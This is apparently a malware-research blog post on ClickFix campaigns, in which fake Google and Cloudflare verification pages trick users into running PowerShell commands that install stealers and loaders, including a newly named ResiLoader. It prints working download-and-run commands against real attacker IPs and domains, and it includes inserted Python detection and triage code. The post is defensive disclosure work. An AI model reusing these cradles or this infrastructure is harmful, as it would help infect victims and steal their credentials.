Fake Google and Cloudflare verification pages spread multiple malware families

July 2, 2026

ClickFix attacks, which trick people into running malicious commands themselves, continue to evolve. This latest campaign uses fake Google and Cloudflare verification pages to convince victims to infect their own devices.

A single mistake can install malware that steals passwords and other sensitive data, gives attackers remote access to your computer, or downloads additional malware that can take full control of your system.

We uncovered multiple campaigns using the same infrastructure to deliver malware including HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, and a Rust-based stealer.

In one infection chain, a trojanized version of the legitimate Franz messaging app downloads a previously undocumented loader dubbed ResiLoader, which disables security software before deploying the StealC infostealer.

Before we look at the technical details, here’s how to avoid becoming the next victim.

How to stay safe

ClickFix attacks rely on convincing you to run commands yourself. The safest approach is simple:

  • Never copy and run commands from a website unless you’re following instructions from a trusted source and understand exactly what the command does.
  • Be wary of verification pages. Google, Cloudflare, Microsoft, and other legitimate services will never ask you to paste PowerShell commands into Windows to prove you’re human or fix a problem.
  • Don’t let urgency rush you. Fake verification pages often use countdown timers, visitor counters, or warnings to pressure you into acting quickly.
  • Keep your security software up to date. Real-time protection and web protection can help block malicious websites before you reach them.
  • Question unexpected technical instructions. If a website tells you to open PowerShell, Command Prompt, or Terminal, stop and verify the instructions through the company’s official support channels.

Pro tip: Malwarebytes Browser Guard can warn you when a website attempts to copy content to your clipboard—a common trick used by ClickFix pages.

Technical analysis

The campaigns analysed in this research have been active since at least late 2025 and use a variety of fake Google and Cloudflare pages to deliver malware. Although the lures differ, they share much of the same infrastructure and infection chain, with the attackers continually testing new delivery methods and payloads.

Different lures, one goal

Most of the campaigns share several characteristics:

  • Use of the folder C:\ProgramData\Zooms to extract later stages
  • PowerShell ClickFix commands that follow similar patterns
  • Use of Cloudflare R2 buckets to deliver payloads
  • IP addresses hosted by the ASN Dedik Services Limited
  • HTML responses containing only the phrase "hehe"

These indicators have changed over time, so they don’t appear in every infection chain. The campaigns continue to evolve, with new payloads and delivery methods regularly introduced. For example, in some cases, the IP address is used directly for payload distribution instead of buckets.

The final command copied by the user usually falls into this pattern: 

powershell -c "iex(irm '{IP}:{Port}/{Random Path}' -UseBasicParsing)"

The port and the path are not always present in the cases analyzed. The ports appear to be chosen at random; those observed include 6600, 9900, 5506, 7895, 7493, 149 and 8442.

Several ClickFix templates, mainly impersonating Google and Cloudflare, are used to get these commands executed. In some cases the PowerShell command was distributed through the IClickFix framework.

We observed these ClickFix campaigns being distributed through:

  • Old websites that have likely expired and been repurchased by the actor(s).
  • Cloudflare Pages (.pages.dev domains).
  • Compromised websites.
  • Fake services, for example related to QR codes or web file access.

Google ClickFix lures 

The actors behind these campaigns use various Google-related HTML pages and kits. 

One lure impersonates Google reCAPTCHA verification. The pages are hosted on random URLs that display fake or malicious content. These domains are often older registrations that recently began resolving to new IP addresses, suggesting they were repurposed for the campaign.

Some of these pages carry URL parameters such as “zoneid”, “cost”, “device”, “country” and “clickid”, for example:

  • /conf/captcha.html?zoneid=10420852
  • /wincapbot/nobot.html
  • /xmr/trkuste.php?zone=5327134
  • bless.php?zoneid=10327549&clickid=1091581084925173761&cost=0.000000&country=US&device=desktop

“Manual Verification Required” ClickFix page

In this case, the functions related to ClickFix are implemented in the class CustomCaptcha. The command is stored in cleartext, without any obfuscation.

“StartVerification” method in the “CustomCaptcha” class

Another distribution method uses Cloudflare Pages hosted on .pages.dev subdomains.

“Verify you’re human” ClickFix page

In this case, the HTML page is obfuscated by declaring several variables and XORing them. The deobfuscated code is labelled SECURITY GATEWAY and is composed of the functions GatewayRuntime, RemoteVault, BeaconDispatcher, Clipboard, TokenController, and PanelController.

The code allows the attackers to retrieve the command either remotely or locally. In this sample, the malicious PowerShell command is stored locally.

The PowerShell command declared in the “SECURITY GATEWAY” code

We also found that some of these domains have distributed another decoy in the past, in this case associated with an unauthorized Google login. This ClickFix lure asks the user to copy and paste the malicious command to set their device as primary. 

“New sign-in with trusted token” ClickFix page

The interesting part of this ClickFix kit is that it features an “approval gate,” as described in the kit’s comments: the attacker manually chooses from the panel which command the victim is asked to execute.

Comments about the kit and the “approval gate”

In more recent campaigns, we’ve detected a ClickFix lure related to Google Meet, which requires copying and pasting a malicious command to fix audio issues. 

The “fix audio driver” Google Meet ClickFix lure

In the analyzed cases, the endpoint /api/driver-clipboard.php returned the following malicious command:

{"mac":"curl -kfsSL $(echo '…'|base64 -D)|zsh","windows":"powershell -c \"iex(irm '151.240.151.126/rRlmZcaaZfAE3U2BaH' -UseBasicParsing)\""} 

Other lures 

The actors behind this campaign use various kits and lures, mostly related to Google. However, we’ve detected other lures whose copied commands point to the same infrastructure.

The attackers behind these campaigns also compromise multiple websites, using different templates of the Cloudflare ClickFix lure.

“Verify you are human” ClickFix pages

We have detected several templates used for the Cloudflare pages. In the cases analyzed, the command is stored either in cleartext or, in some templates, obfuscated.

Some of the Cloudflare ClickFix HTML pages

We also detected purpose-built fake service websites. For example, a “My QR Generator” site displays an obfuscated QR code and asks the user to run a PowerShell command to verify that they are not a robot.

“QR Code” ClickFix lure page

In this case the command is base64-encoded:

Decoded PowerShell command
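The copied command shape described earlier, the /api/driver-clipboard.php JSON reply and the base64-encoded variant served by the QR lure can all be normalised by one extractor. The following is an added example, not code from the write-up: it pulls the host, port and path out of each form, treats base64 blobs as PowerShell -EncodedCommand (UTF-16LE) or UTF-8 text, and flags the ports the write-up lists; the 203.0.113.0/24 addresses in the samples are documentation addresses, not indicators from the campaign.

```python
import base64
import json
import re

# Copied command shape from the write-up (port and path optional, quotes may be curly):
#   powershell -c "iex(irm '{IP}:{Port}/{Random Path}' -UseBasicParsing)"
Q = "'\"\u2018\u2019\u201c\u201d"
CRADLE_RE = re.compile(
    r"iex\s*\(\s*(?:irm|invoke-restmethod)\s+[" + Q + r"]?(?:https?://)?"
    r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<port>\d{1,5}))?"
    r"(?P<path>/[^" + Q + r"\s]*)?",
    re.IGNORECASE,
)
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
KNOWN_PORTS = {6600, 9900, 5506, 7895, 7493, 149, 8442}  # ports quoted in the write-up

def _decode_b64(token):
    """Decode base64 as UTF-16LE (PowerShell -EncodedCommand style) when the bytes look like it, else UTF-8."""
    try:
        raw = base64.b64decode(token, validate=True)
        utf16 = len(raw) % 2 == 0 and not any(raw[1::2])
        return raw.decode("utf-16-le" if utf16 else "utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None

def extract_cradles(text):
    """Find cradles in a pasted command or a JSON reply like /api/driver-clipboard.php's."""
    try:
        candidates = [(k, v) for k, v in json.loads(text).items() if isinstance(v, str)]
    except (ValueError, AttributeError):  # not JSON, or not a {"platform": "command"} object
        candidates = [("any", text)]
    hits = []
    for platform, cmd in candidates:
        for tok in B64_RE.findall(cmd):  # expand base64-encoded commands before matching
            decoded = _decode_b64(tok)
            if decoded:
                cmd += " " + decoded
        for m in CRADLE_RE.finditer(cmd):
            port = int(m.group("port")) if m.group("port") else None
            hits.append({"platform": platform, "host": m.group("host"), "port": port,
                         "path": m.group("path") or "/", "known_port": port in KNOWN_PORTS})
    return hits

# Constructed samples; 203.0.113.0/24 is a documentation range, not an indicator from the write-up.
SAMPLE_JSON = json.dumps({"mac": "curl -kfsSL $(echo 'x'|base64 -D)|zsh",
                          "windows": "powershell -c \"iex(irm '203.0.113.10/x9Qp' -UseBasicParsing)\""})
SAMPLE_ENCODED = base64.b64encode(
    "iex(irm '203.0.113.20:9900/zz' -UseBasicParsing)".encode("utf-16-le")).decode()
```

Feeding a clipboard-monitor or proxy capture through extract_cradles gives the host and port to pivot on, regardless of whether the page served the command in plain, JSON or base64 form.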

PowerShell downloader 

The ClickFix command executed by the user decodes a script and drops it into the Temp folder under the name tmp{4 char}.tmp.ps1.

We have detected several variations of this script, but recent versions do the following: 

  • Create the folder C:\ProgramData\Zooms.
  • Download the next stage from a Cloudflare bucket and save it in C:\ProgramData\Zooms. In some variants of the script, the next stage is downloaded directly from an IP address.
  • Send information about the compromised machine to http://{IP}/dl-callback. In some variants of the script, this step is absent.

Dropped PowerShell script

The campaigns deliver a wide variety of payloads. The table below summarises some of the downloaded filenames and the malware they install. In many of the cases analyzed, the final payload was delivered via DLL hijacking, as we will also see later for the StealC stealer.

File distributed                 Malware distributed
libEGL.zip, Safe-1.zip           Trojanized Electron app, ResiLoader and StealC
Test.msi                         Deno Loader and PowerShell Stealer
arworks.zip                      Amatera Stealer
water-night.zip                  Remus Stealer
Setup.msi, Invintrum_first.msi   NetSupport
traffic1.msi                     CastleLoader
ibrowser.exe                     Rust Stealer

We analyzed a new loader called ResiLoader that ultimately delivers StealC. We also observed that, in the latest campaigns, the threat actor has started using Deno to deliver a stealer written in PowerShell as the final stage; the analysis of that infection chain may be the subject of a future blog post.

Trojanized Electron app downloads ResiLoader

In this case, the ZIP was downloaded from: 

  • pub-7080e0c20a0e47ca95a476869c532367.r2[.]dev/libEGL.zip 

After extraction to: 

  • C:\ProgramData\Zooms\libEGL.zip_ext

The zip contains a trojanized version of the open-source messaging app called “Franz”: 

The trojanized “Franz” app used to download ResiLoader

The malicious code is implemented in the index.js file: 

The obfuscated code in the backdoored app

The downloader performs the following operations:

  • Decodes its strings with the function HC().
  • Reads readme.txt, expects a campaign key of the form AAAA-BBBB, and returns it as an array of tokens. In this case the name is resiloader-1, which is why we call the downloaded DLL “ResiLoader”.
  • Reads %APPDATA%\setup.txt; if the file is absent, generates a random 8-character string and persists it there.
  • Establishes persistence using app.setLoginItemSettings.
  • Sends a POST request to https[:]//completstep[.]com/api/ and processes the JSON response:
    • If task.e is present, it executes eval(task.e), allowing the attacker to run arbitrary JavaScript code.
    • If task.files is present, it creates %TEMP%\<Date.now()>\, decodes and writes each file, and, if any filename ends in .exe, runs it via child_process.exec.

In our case we received a ZIP that performs DLL hijacking of ssh-add.exe:

{"task":{"name":"JUNE18USY","files":{
   "msys-2.0.dll":"<base64>",
   "msys-crypto-3.dll":"<base64>",
   "msys-gcc_s-seh-1.dll":"<base64>",
   "ssh-add.exe":"<base64>" }}}

The executable was then launched with:

C:\WINDOWS\system32\cmd.exe /d /s /c ""C:\Users\{user}\AppData\Local\Temp\1782122017599\ssh-add.exe"" 

ResiLoader

The msys-crypto-3.dll is an obfuscated .NET NativeAOT loader that implements AV/EDR evasion with a bring-your-own-vulnerable-driver (BYOVD) technique, establishes persistence and ultimately loads the StealC stealer. We did not find an existing attribution for this loader, so we named it “ResiLoader” after the string found in the readme.txt mentioned above.

The loader contains several strings, some in cleartext and some encrypted. Once the strings are decrypted, a full picture of ResiLoader’s functionality emerges:

MANPO: ReadModule len=...
MANPO: magicOffset=...
…
PERS: FAIL all file copies failed, skipping run key
PERS: FAIL both HKLM and HKCU Run key writes failed
…
RUNPE: CreateProcess failed
RUNPE: PEB patched
RUNPE: VirtualAllocEx failed
…
POST: RunForever exited (unexpected)
POST: entering RunForever
POST: hollow=

The loader performs the following operations:

  • Extracts the encoded blob containing two payloads by locating the marker AtLorenBase and reading the length of the blob. It then decodes the blob and decrypts the driver pcdhost.sys (OPSWAT AppRemover driver) and the StealC payload using a custom decryption algorithm.
  • Terminates more than 140 EDR/AV-related processes using the dropped driver.
  • Bypasses UAC via the ICMLuaUtil elevated COM interface.
  • Creates the folder C:\ProgramData\Google Update, copies itself there and establishes persistence through the Run registry key with the command:
    • cmd /c start "" /D "C:\ProgramData\Google Update" ssh-add.exe

In the end, the loader performs process hollowing of the process ServiceModelReg.exe to run the StealC stealer. 
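Host-side, the dropped PowerShell script (Zooms staging folder, /dl-callback beacon), the ssh-add.exe launch from a Date.now() folder under %TEMP%, and ResiLoader’s Google Update Run key, driver load and ServiceModelReg.exe hollowing all leave artefacts that a Sysmon-style pipeline can match. The triage routine below is an added example, not code from the write-up; the record layout, the user name, the driver’s drop location and the 203.0.113.0/24 address are constructed for the example.

```python
import re

# Paths and command shapes are those named in the write-up; comparisons are case-insensitive.
STAGING_DIR = r"c:\programdata\zooms"           # the dropped PowerShell script stages payloads here
CALLBACK_PATH = "/dl-callback"                  # host-info beacon sent by the dropped script
PERSIST_DIR = r"c:\programdata\google update"   # ResiLoader copies itself here and adds a Run key
DRIVER = "pcdhost.sys"                          # OPSWAT AppRemover driver used to kill AV/EDR
RUN_KEY_RE = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\", re.I)
START_RE = re.compile(r'cmd(?:\.exe)?\s+/c\s+start\s+""\s+/D\s+"([^"]+)"\s+ssh-add\.exe', re.I)
# %TEMP%\<Date.now()>\ssh-add.exe: Date.now() is assumed to be 13 digits (true for current dates)
TEMP_SSHADD_RE = re.compile(r"\\appdata\\local\\temp\\\d{13}\\ssh-add\.exe", re.I)

def triage(events):
    """Return (rule, detail) pairs for Sysmon-style records that match the chain's host artefacts."""
    hits = []
    for ev in events:
        kind = ev["type"]
        if kind == "file_create" and ev["path"].lower().startswith(STAGING_DIR + "\\"):
            hits.append(("zooms_staging", ev["path"]))
        elif kind == "network" and ev["url"].lower().rstrip("/").endswith(CALLBACK_PATH):
            hits.append(("dl_callback", ev["url"]))
        elif kind == "registry_set" and RUN_KEY_RE.search(ev["key"]) and PERSIST_DIR in ev["data"].lower():
            hits.append(("googleupdate_runkey", ev["key"] + " = " + ev["data"]))
        elif kind == "driver_load" and ev["image"].lower().endswith("\\" + DRIVER):
            hits.append(("opswat_driver_load", ev["image"]))
        elif kind == "process_create":
            m = START_RE.search(ev["cmdline"])
            if m and m.group(1).lower() == PERSIST_DIR:
                hits.append(("googleupdate_launch", ev["cmdline"]))
            elif TEMP_SSHADD_RE.search(ev["cmdline"]):
                hits.append(("temp_sshadd_launch", ev["cmdline"]))
            elif ev.get("image", "").lower().endswith("\\servicemodelreg.exe") and \
                    ev.get("parent_image", "").lower().endswith("\\ssh-add.exe"):
                hits.append(("hollowing_target", ev["parent_image"] + " -> " + ev["image"]))
    return hits

# Constructed records: user name, drop locations and the 203.0.113.0/24 address are made up for the example.
SAMPLE_EVENTS = [
    {"type": "file_create", "path": r"C:\ProgramData\Zooms\libEGL.zip"},
    {"type": "network", "url": "http://203.0.113.10/dl-callback"},
    {"type": "process_create", "image": r"C:\Users\alice\AppData\Local\Temp\1782122017599\ssh-add.exe",
     "cmdline": r'C:\WINDOWS\system32\cmd.exe /d /s /c ""C:\Users\alice\AppData\Local\Temp\1782122017599\ssh-add.exe""'},
    {"type": "driver_load", "image": r"C:\ProgramData\Google Update\pcdhost.sys"},
    {"type": "registry_set", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdate",
     "data": r'cmd /c start "" /D "C:\ProgramData\Google Update" ssh-add.exe'},
    {"type": "process_create", "image": r"C:\ProgramData\Google Update\ssh-add.exe",
     "cmdline": r'cmd /c start "" /D "C:\ProgramData\Google Update" ssh-add.exe'},
    {"type": "process_create", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe",
     "parent_image": r"C:\ProgramData\Google Update\ssh-add.exe", "cmdline": "ServiceModelReg.exe"},
]
```

Because pcdhost.sys is a legitimate signed driver, the opswat_driver_load rule is a review signal rather than a verdict on its own; the combination with the Zooms staging and Google Update persistence is what makes the chain distinctive.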

IOCs 

Hash 


Domains 

Distribute ClickFix pages: 


CloudFlare buckets used for payload distribution


IPs 

IP used for payload distribution



About the author

Gabriele is a Malware Research Engineer who loves fighting malware. When he's not doing that, you’ll find him enjoying nature, art, and animals.